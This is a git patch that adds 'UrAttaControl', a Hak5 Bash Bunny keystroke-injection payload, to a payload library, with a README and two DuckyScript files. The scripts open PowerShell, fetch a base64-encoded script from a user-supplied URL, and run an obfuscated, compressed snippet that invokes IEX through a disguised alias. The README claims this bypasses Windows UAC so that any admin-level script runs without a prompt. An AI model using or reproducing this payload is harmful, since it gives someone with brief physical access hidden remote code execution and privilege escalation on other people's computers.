From 791cc4e1aa2b07814674c2d1d5413c6adf228b93 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 17 May 2022 16:35:51 -0500 Subject: [PATCH] Add files via upload (#524) --- .../execution/-BB-UrAttaControl/README.md | 104 ++++++++++++++++++ .../-BB-UrAttaControl/UrAttaControl.txt | 30 +++++ .../execution/-BB-UrAttaControl/payload.txt | 21 ++++ 3 files changed, 155 insertions(+) create mode 100644 payloads/library/execution/-BB-UrAttaControl/README.md create mode 100644 payloads/library/execution/-BB-UrAttaControl/UrAttaControl.txt create mode 100644 payloads/library/execution/-BB-UrAttaControl/payload.txt diff --git a/payloads/library/execution/-BB-UrAttaControl/README.md b/payloads/library/execution/-BB-UrAttaControl/README.md new file mode 100644 index 00000000..d78b4fe5 --- /dev/null +++ b/payloads/library/execution/-BB-UrAttaControl/README.md @@ -0,0 +1,104 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# UrAttaControl + +A script used to open an elevated powershell console and execute admin level commands + +## Description + +Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script + +This script will use IEX to download a base64 script to the $Payload variable + +Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64 + +script saved in the $Payload variable + +This payload completely bypasses the UAC and will run any admin level script without a prompt + +You can use this function I wrote to convert your .ps1 sscripts to Base64 + +https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* A keystroke injection based payload will run + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-UrAttaControl) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/payloads/library/execution/-BB-UrAttaControl/UrAttaControl.txt b/payloads/library/execution/-BB-UrAttaControl/UrAttaControl.txt new file mode 100644 index 00000000..3c4890d4 --- /dev/null +++ b/payloads/library/execution/-BB-UrAttaControl/UrAttaControl.txt @@ -0,0 +1,30 @@ +REM Title: UrAttaControl + +REM Author: I am Jakoby + +REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script. +REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details + +REM Target: Windows 10, 11 + +REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable +REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad + +REM You can use this function I wrote to convert your .ps1 sscripts to Base64 +REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md + +GUI r +DELAY 500 +STRING powershell +ENTER + +DELAY 1000 + +STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT" +SHIFT ENTER +STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content +SHIFT ENTER +STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'') +SHIFT ENTER +STRING exit +ENTER diff --git a/payloads/library/execution/-BB-UrAttaControl/payload.txt b/payloads/library/execution/-BB-UrAttaControl/payload.txt new file mode 100644 index 00000000..9846cf48 --- /dev/null +++ b/payloads/library/execution/-BB-UrAttaControl/payload.txt @@ -0,0 +1,21 @@ +REM Title: UrAttaControl + +REM Author: I am Jakoby + +REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script. +REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details + +REM Target: Windows 10, 11 + +LED SETUP + +GET SWITCH_POSITION + +ATTACKMODE HID STORAGE + +LED STAGE1 + +QUACK DELAY 3000 +LED STAGE1 +QUACK ${SWITCH_POSITION}/UrAttaControl.txt +